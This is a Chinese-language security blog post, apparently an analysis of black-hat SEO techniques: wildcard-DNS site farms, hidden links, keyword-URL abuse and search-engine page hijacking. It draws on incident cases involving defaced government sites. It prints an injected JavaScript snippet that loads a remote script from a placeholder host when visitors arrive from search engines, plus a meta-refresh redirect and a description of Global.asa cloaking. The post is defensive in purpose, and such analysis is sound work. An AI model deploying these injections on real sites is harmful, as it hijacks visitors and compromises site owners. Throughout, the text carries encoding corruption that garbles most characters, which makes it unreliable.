當(dāng)我發(fā)現(xiàn)公開資源中對(duì)此黑產(chǎn)手法的介紹寥寥無(wú)幾且并不詳細(xì)時(shí),原因便可想而知了。為了營(yíng)造了一個(gè)良好的互聯(lián)網(wǎng)環(huán)境,我在此結(jié)合實(shí)際案列對(duì)黑帽SEO這種黑產(chǎn)手段進(jìn)行剖析介紹,希望能夠使安全界同道引起共鳴,共同抵制。
由于距本文撰寫已過(guò)去一年之久,而此期間我已不在研究相關(guān)技術(shù),因此若文章內(nèi)容有任何偏差及謬誤請(qǐng)諒解。
插曲:有趣的是,就在前幾天有位朋友詢問(wèn)了我關(guān)于黑帽SEO方面的問(wèn)題,原因是他一位朋友運(yùn)營(yíng)的一個(gè)網(wǎng)站,頁(yè)面莫名其妙出現(xiàn)了賭博博彩的內(nèi)容,刪除后又會(huì)自動(dòng)生成,其十分苦難便尋求他幫忙。
黑帽seo概念
SEO全稱為搜索引擎優(yōu)化,是指通過(guò)站內(nèi)優(yōu)化、站外優(yōu)化等方式,提升搜索引擎收錄排名。既然有SEO技術(shù),便會(huì)有相應(yīng)的從業(yè)人員,他們被稱為白帽SEO,專指通過(guò)公正SEO手法,幫助提升站點(diǎn)排名的專業(yè)人員。
當(dāng)然有白便會(huì)有黑,由于白帽SEO優(yōu)化的過(guò)程將會(huì)十分漫長(zhǎng),一個(gè)新站想要獲取好的排名,往往需要花上幾年時(shí)間做優(yōu)化推廣。因此一些想要快速提升自身網(wǎng)站排名的小伙伴,便開始在SEO上研究作弊手法,從而誕生了黑帽SEO。黑帽SEO是指通過(guò)作弊手段,讓站點(diǎn)快速提升排名的一類SEO技術(shù),或者說(shuō)是黑客技術(shù),比如說(shuō):黑鏈(暗鏈)、站群、網(wǎng)站劫持(搜索引擎劫持)、橋頁(yè)等,黑帽SEO能夠快速提升排名,但畢竟是違規(guī)作弊行為,容易被K。
SEO的一些黑色手法
黑帽SEO的手法很多,并且在不斷地更新?lián)Q代,其中最常見的包括利用泛解析做站群,入侵高權(quán)重網(wǎng)站掛暗鏈,入侵高權(quán)重網(wǎng)站做網(wǎng)頁(yè)劫持,篡改高權(quán)重網(wǎng)站網(wǎng)頁(yè)內(nèi)容,利用高權(quán)重網(wǎng)站二級(jí)目錄做推廣頁(yè)面,修改nginx配置做目錄反向代理等等。接下來(lái)我結(jié)合實(shí)際案例,介紹一些常用的手段。
利用泛解析建立泛二級(jí)域名站群
利用DNS泛解析可以快速建立站群,因?yàn)橐粋€(gè)一級(jí)域名便可以衍生出無(wú)數(shù)個(gè)二級(jí)域名,當(dāng)然一般需要借助站群工具,因?yàn)榻⒄救盒枰泻芏鄡?nèi)容不同的頁(yè)面,手工建立顯然不可能。而seo人員大費(fèi)周章地建立站群的目的,便是能夠快速吸引大量的搜索引擎爬蟲,增加網(wǎng)站在搜索引擎中的收錄量。以下是某個(gè)泛二級(jí)域名站群案例截圖:
需要說(shuō)明的是,以上截圖中的二級(jí)域名并不是通過(guò)一條條dns解析記錄去綁定的,解析里面設(shè)置的是*,也就是泛解析。而服務(wù)器端有程序或者代碼去控制當(dāng)構(gòu)造不同的二級(jí)域名訪問(wèn)時(shí),會(huì)返回不同的網(wǎng)頁(yè)內(nèi)容,也就讓搜索引擎誤認(rèn)為每個(gè)二級(jí)域名都是一個(gè)單獨(dú)的網(wǎng)站。
泛解析有很多優(yōu)點(diǎn),比如對(duì)用戶友好(即使輸錯(cuò)二級(jí)域名也能跳轉(zhuǎn)到目標(biāo)網(wǎng)站),又能夠更快速地被搜索引擎收錄等。基于這些優(yōu)點(diǎn),很多站長(zhǎng)會(huì)選擇用此方式來(lái)增加網(wǎng)站收錄,然而如果沒(méi)有妥善的使用泛解析可能會(huì)帶來(lái)難以想象的危害。
利用泛解析做黑產(chǎn)
利用泛解析做黑帽seo的方式也有很多種,基于是否需要入侵網(wǎng)站以及dns服務(wù)器,我分為入侵法與非入侵法來(lái)介紹。
入侵法
真實(shí)案例:幾個(gè)月前我們發(fā)現(xiàn)一個(gè)重要政府網(wǎng)站出現(xiàn)了大量博彩頁(yè)面,取證截圖如下:
經(jīng)過(guò)分析我發(fā)現(xiàn),此手法利用的便是泛解析,從截圖中可以看到出現(xiàn)了大量此政府網(wǎng)站的二級(jí)甚至三級(jí)域名,而這些域名都是隨機(jī)構(gòu)造的,訪問(wèn)后會(huì)跳轉(zhuǎn)到博彩色情等非法頁(yè)面,而訪問(wèn)一級(jí)域名又是正常的內(nèi)容。且先不分析跳轉(zhuǎn)的過(guò)程中用到了哪些技術(shù),單從泛解析記錄就不難看出,此網(wǎng)站被人篡改了dns解析記錄。我們有理由相信,黑客獲取了此域名的dns解析控制權(quán)限,并將此域名泛解析到黑客準(zhǔn)備好的服務(wù)器上。那么黑客這么做的目的很明顯,為了讓搜索引擎快速收錄二級(jí)或者三級(jí)域名,從而達(dá)到引流到非法頁(yè)面的目的。
我們通過(guò)分析此政府網(wǎng)站被入侵特征推導(dǎo)出此事件過(guò)程應(yīng)該是,黑客通過(guò)入侵手段獲取到了該政府網(wǎng)站dns解析權(quán)限(如何獲取暫不可知),然后通過(guò)添加泛解析記錄,將此記錄指向黑客準(zhǔn)備好的服務(wù)器,而此服務(wù)器上有動(dòng)態(tài)語(yǔ)言去實(shí)現(xiàn)通過(guò)不同二級(jí)域名訪問(wèn),返回不同的頁(yè)面結(jié)果功能。由于政府網(wǎng)站本身權(quán)重很高,因此二級(jí)域名頁(yè)面被百度快速收錄,達(dá)到為非法頁(yè)面引流的目的。這種手法的好處在于不必入侵網(wǎng)站,而只要獲取到域名解析權(quán)限即可(當(dāng)然獲取域名解析權(quán)限也并非易事)。
非入侵法
真實(shí)案例:幾天前我們發(fā)現(xiàn)有一個(gè)網(wǎng)站(sdddzg.cn)利用泛解析做惡意推廣,查看網(wǎng)站特征后,我們嘗試構(gòu)造不同的二級(jí)域名訪問(wèn),取證截圖如下。構(gòu)造二級(jí)域名訪問(wèn):
最終返回結(jié)果:
可以看到返回結(jié)果對(duì)網(wǎng)頁(yè)內(nèi)容以及url做了處理,當(dāng)我們嘗試構(gòu)造不同的二級(jí)域名訪問(wèn),發(fā)現(xiàn)返回結(jié)果內(nèi)容都不一樣,然而通過(guò)獲取ip發(fā)現(xiàn)來(lái)自同一臺(tái)服務(wù)器。首先我們不難想到,此域名一定是做了泛解析的,那么它是如何控制網(wǎng)頁(yè)內(nèi)容變化的呢?查看網(wǎng)頁(yè)源碼可以看到j(luò)iang.gov.cn網(wǎng)頁(yè)源碼被嵌入到了目標(biāo)網(wǎng)頁(yè)中。
那么其實(shí)想要實(shí)現(xiàn)此技術(shù)也并不難,可以在服務(wù)端上用代碼實(shí)現(xiàn)。首先通過(guò)獲取請(qǐng)求的二級(jí)域名地址,然后去訪問(wèn)該二級(jí)域名內(nèi)容獲取源碼鑲嵌到自己的網(wǎng)頁(yè)內(nèi)。如果構(gòu)造的二級(jí)域名內(nèi)容不是一個(gè)完整的域名地址(如:1.sdddzg.cn),則隨機(jī)返回一段源碼。這種手法的好處在于不必入侵網(wǎng)站,只需要自己搭建一臺(tái)服務(wù)器即可,但推廣效果沒(méi)有那么好。
利用網(wǎng)站暗鏈
在網(wǎng)頁(yè)中植入暗鏈這種手法已經(jīng)相對(duì)落伍了,目前用的也比較少,因?yàn)樗阉饕嬉呀?jīng)能夠?qū)Υ俗鞅资址ㄟM(jìn)行檢測(cè)。為了介紹知識(shí)的完整性,此處我簡(jiǎn)單介紹一下。暗鏈也稱為黑鏈,即隱蔽鏈接 hidden links,是黑帽SEO的作弊手法之一。掛暗鏈的目的很簡(jiǎn)單,增加網(wǎng)站外鏈,提高網(wǎng)站排名;實(shí)現(xiàn)方式主要分為幾種:利用CSS實(shí)現(xiàn)、利用JS實(shí)現(xiàn)、利用DIV+JS實(shí)現(xiàn)等。具體介紹請(qǐng)參考:黑帽SEO之暗鏈
利用高權(quán)重網(wǎng)站,構(gòu)造關(guān)鍵詞URL做推廣
真實(shí)案例:一年前當(dāng)我剛研究黑帽SEO的時(shí)候發(fā)現(xiàn)了一個(gè)有趣的黑帽SEO方式,雖然手法比較拙劣老套,但卻也有成效。于是在寫這篇文章的時(shí)候,我特意找了一個(gè)典型案例,與大家分享,取證截圖如下。
將URL中的參數(shù)內(nèi)容顯示到網(wǎng)頁(yè)內(nèi),這原本是某些網(wǎng)頁(yè)的一種特殊功能。以往的經(jīng)驗(yàn)告訴我這種特性如果沒(méi)有處理好,可能會(huì)引發(fā)XSS漏洞,而今我不得不認(rèn)識(shí)到,這種特性也一直被用于黑帽seo。通過(guò)在url或者post數(shù)據(jù)包(常見于搜索框功能)中構(gòu)造推廣關(guān)鍵詞,再將有推廣關(guān)鍵詞頁(yè)面添加到蜘蛛池中,使搜索引擎收錄就能達(dá)到推廣的目的。一般此種手法常被用來(lái)推廣qq號(hào),盈利網(wǎng)站等(類似打廣告),而當(dāng)我們通過(guò)搜索引擎搜索某些關(guān)鍵詞時(shí)(如色情資源),就會(huì)顯示出此頁(yè)面,從而達(dá)到推廣自身賬號(hào)或者網(wǎng)站的目的,當(dāng)然這只是一種推廣手段,并不太涉及引流。
利用網(wǎng)頁(yè)劫持引流
網(wǎng)頁(yè)劫持,又叫網(wǎng)站劫持或者搜索引擎劫持,是目前黑帽SEO中最流行的一種做法。其原因可以簡(jiǎn)單概括為:易收錄、難發(fā)現(xiàn),易收錄表現(xiàn)為搜索引擎尚沒(méi)有很好的機(jī)制能夠檢測(cè)出此作弊手段,網(wǎng)頁(yè)劫持手法仍然能夠大量引流。難發(fā)現(xiàn)是指網(wǎng)頁(yè)劫持手法比較隱蔽,一般非技術(shù)人員很難發(fā)現(xiàn)它的存在。
網(wǎng)頁(yè)劫持從手法上可以分為服務(wù)端劫持、客戶端劫持、百度快照劫持、百度搜索劫持等等;
網(wǎng)頁(yè)劫持的表現(xiàn)形式可以是劫持跳轉(zhuǎn),也可以是劫持呈現(xiàn)的網(wǎng)頁(yè)內(nèi)容(與直接篡改網(wǎng)頁(yè)內(nèi)容不同),目前被廣泛應(yīng)用于私服、博彩等暴利行業(yè)。
網(wǎng)頁(yè)劫持真實(shí)案例
幾個(gè)月前我處理了一起網(wǎng)頁(yè)劫持案列,起因是某政府網(wǎng)站上出現(xiàn)了博彩相關(guān)內(nèi)容(排除新聞頁(yè)面),這顯然是不合規(guī)的。排除管理員失誤添加導(dǎo)致,恐怕此網(wǎng)站多半是被黑客入侵了。首先我訪問(wèn)了該記錄上的鏈接,緊接著瀏覽器中出現(xiàn)了一個(gè)正常的政府頁(yè)面,而也就須臾之間,網(wǎng)頁(yè)瞬間又跳轉(zhuǎn)到了博彩網(wǎng)頁(yè)。圖一為正常政府頁(yè)面:
圖二為博彩頁(yè)面:
可以看到博彩頁(yè)面的域名為www.0980828.com,顯然不是先前的政府網(wǎng)站域名xxxx.gov.cn。看到此現(xiàn)象,再結(jié)合多年安全經(jīng)驗(yàn),我大致能夠猜測(cè)此網(wǎng)站應(yīng)該是被網(wǎng)頁(yè)劫持了。通過(guò)分析以上過(guò)程的數(shù)據(jù)包,不難發(fā)現(xiàn)在該網(wǎng)站前端頁(yè)面被嵌入了一段非法代碼。
此代碼存放在43.250.75.61服務(wù)器上,查看該服務(wù)器信息,發(fā)現(xiàn)其在日本。
而通過(guò)訪問(wèn)此段代碼,返回內(nèi)容則是跳轉(zhuǎn)到www.0980828.com網(wǎng)站上。
分析至此,我們不難發(fā)現(xiàn),導(dǎo)致頁(yè)面跳轉(zhuǎn)的原因便是xxxx.gov.cn網(wǎng)頁(yè)被非法嵌入了一竄代碼,而此代碼能夠控制訪問(wèn)該網(wǎng)頁(yè)時(shí)跳轉(zhuǎn)到博彩頁(yè)面。這是搜索引擎劫持最為基礎(chǔ)且常見的一種方式,其變種甚多,類型方式也各異。最后我通過(guò)登錄web服務(wù)器查看,發(fā)現(xiàn)了存在大量html文件被篡改,且都在文件開頭被寫入外部js引用。那么此入侵事件過(guò)程應(yīng)該是,黑客通過(guò)web應(yīng)用程序某些漏洞入侵服務(wù)器(實(shí)際是管理后臺(tái)弱口令+任意文件上傳),通過(guò)批量篡改服務(wù)器靜態(tài)文件實(shí)現(xiàn)網(wǎng)頁(yè)劫持的目的。網(wǎng)頁(yè)劫持的手法非常多,并不是這一個(gè)案例就能概括的,更多詳細(xì)情況請(qǐng)繼續(xù)看下文介紹。
服務(wù)端劫持
服務(wù)端劫持也稱為全局劫持,此手法為修改網(wǎng)站動(dòng)態(tài)語(yǔ)言文件,判斷訪問(wèn)來(lái)源控制返回內(nèi)容,從而達(dá)到網(wǎng)頁(yè)劫持的目的。其特點(diǎn)往往是通過(guò)修改asp/aspx/php等后綴名文件,達(dá)到動(dòng)態(tài)呈現(xiàn)網(wǎng)頁(yè)內(nèi)容的效果。
Global.asa、Global.asax、conn.asp、conn.php等文件比較特殊,作用是在每次執(zhí)行一個(gè)動(dòng)態(tài)腳本的時(shí)候,都會(huì)先加載該腳本,然后再執(zhí)行目標(biāo)腳本。所以只要在 Global.asa 中寫判斷用戶系統(tǒng)信息的代碼(訪問(wèn)來(lái)源等),如果是蜘蛛訪問(wèn)則返回關(guān)鍵詞網(wǎng)頁(yè)(想要推廣的網(wǎng)站),如果是用戶訪問(wèn)則返回正常頁(yè)面。
客戶端劫持
客戶端劫持的手法也很多,但最常用的就兩種:js劫持與Header劫持。js劫持目的是通過(guò)向目標(biāo)網(wǎng)頁(yè)植入惡意js代碼,控制網(wǎng)站跳轉(zhuǎn)、隱藏頁(yè)面內(nèi)容、窗口劫持等。js植入手法是可以通過(guò)入侵服務(wù)器,直接寫入源代碼中;也可以寫在數(shù)據(jù)庫(kù)中,因?yàn)橛行╉?yè)面會(huì)呈現(xiàn)數(shù)據(jù)庫(kù)內(nèi)容。js劫持代碼案例:以下代碼可以使通過(guò)搜索引擎搜索的并點(diǎn)擊頁(yè)面時(shí),執(zhí)行一段js并跳轉(zhuǎn)到博彩頁(yè)面;而直接輸入網(wǎng)址訪問(wèn)網(wǎng)頁(yè)時(shí),跳轉(zhuǎn)到一個(gè)404頁(yè)面。
today=new Date();today=today.getYear()+"-"+(today.getMonth()+1)+"-"+today.getDate();var regexp=/\.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|vnet|360|ioage|sm|sp)(\.[a-z0-9\-]+){1,2}\//ig;var where =document.referer;if(regexp.test(where)){document.write ('<script language="javascript" type="text/javascript" src="http://www.xxx.com/test.js"></script>');}else{window.location.href="../../404.htm";}
代碼分析:通過(guò)referer判斷來(lái)路,如果referer來(lái)路為空就是跳轉(zhuǎn)到404頁(yè)面,如果是搜索引擎來(lái)的referer里面也會(huì)有顯示,然后在寫代碼控制跳轉(zhuǎn)。如果只是控制實(shí)現(xiàn)顯示不同的內(nèi)容,可以修改php、asp代碼;如果需要劫持搜索引擎搜索框,可以寫JS代碼來(lái)做瀏覽器本地跳轉(zhuǎn)。當(dāng)然js功能可以無(wú)限擴(kuò)展,比如可以控制一個(gè)ip一天內(nèi)第一次訪問(wèn)正常,其余訪問(wèn)跳轉(zhuǎn)等等。header劫持,就是在html代碼的head中添加特殊標(biāo)簽,代碼如下:
<meta http-equiv="refresh" content="10; url=http://thief.one">
header劫持利用的就是Meta Refresh Tag(自動(dòng)轉(zhuǎn)向)功能將流量引走。
直接篡改網(wǎng)頁(yè)內(nèi)容(比較低級(jí))
有些黑客在入侵網(wǎng)站后,喜歡直接篡改網(wǎng)頁(yè)內(nèi)容,比如放上自己的qq號(hào),或者作為推廣將網(wǎng)頁(yè)篡改成非法頁(yè)面。在此我對(duì)此做法的黑客表示鄙視,因?yàn)檫@是一種最惡劣最低級(jí)的手法。惡劣在于直接篡改網(wǎng)頁(yè)內(nèi)容,可能會(huì)導(dǎo)致網(wǎng)站無(wú)法挽回的損失;低級(jí)在于此手法極易被發(fā)現(xiàn),起不到真正的引流推廣作用。
利用高權(quán)重網(wǎng)站二級(jí)目錄
即黑客入侵網(wǎng)站后,在網(wǎng)站二級(jí)目錄下創(chuàng)建很多自己做推廣的頁(yè)面。為了達(dá)到引流的目的黑客往往需要建立大量的二級(jí)目錄頁(yè)面,因此需要用到寄生蟲程序來(lái)自動(dòng)化的創(chuàng)建頁(yè)面。此手法也需要入侵高權(quán)重網(wǎng)站,獲取網(wǎng)站服務(wù)器權(quán)限。與網(wǎng)頁(yè)劫持手法不同的是,此手法側(cè)重點(diǎn)在于利用高權(quán)重網(wǎng)站自身的優(yōu)勢(shì),在其目錄下創(chuàng)建多個(gè)推廣頁(yè)面;而網(wǎng)頁(yè)劫持側(cè)重隱藏自身,其可以做到動(dòng)態(tài)呈現(xiàn)網(wǎng)頁(yè)內(nèi)容給客戶。因此在實(shí)際使用中,黑客經(jīng)常結(jié)合兩者使用。此手法與利用泛解析做黑帽seo的手法還是有明顯差異的,雖然同樣是利用高權(quán)重網(wǎng)站本身的優(yōu)勢(shì),但泛解析利用的是二級(jí)域名,而此手法利用的是二級(jí)目錄,當(dāng)然兩者有異曲同工之妙。
利用高權(quán)重網(wǎng)站二級(jí)目錄手法的案例與泛解析案例類似,這里不再詳述。既然我前面提到此手法往往需要寄生蟲程序的配合使用,那么何為寄生蟲程序?它又有何玄機(jī)?下篇將會(huì)詳細(xì)介紹,敬請(qǐng)期待。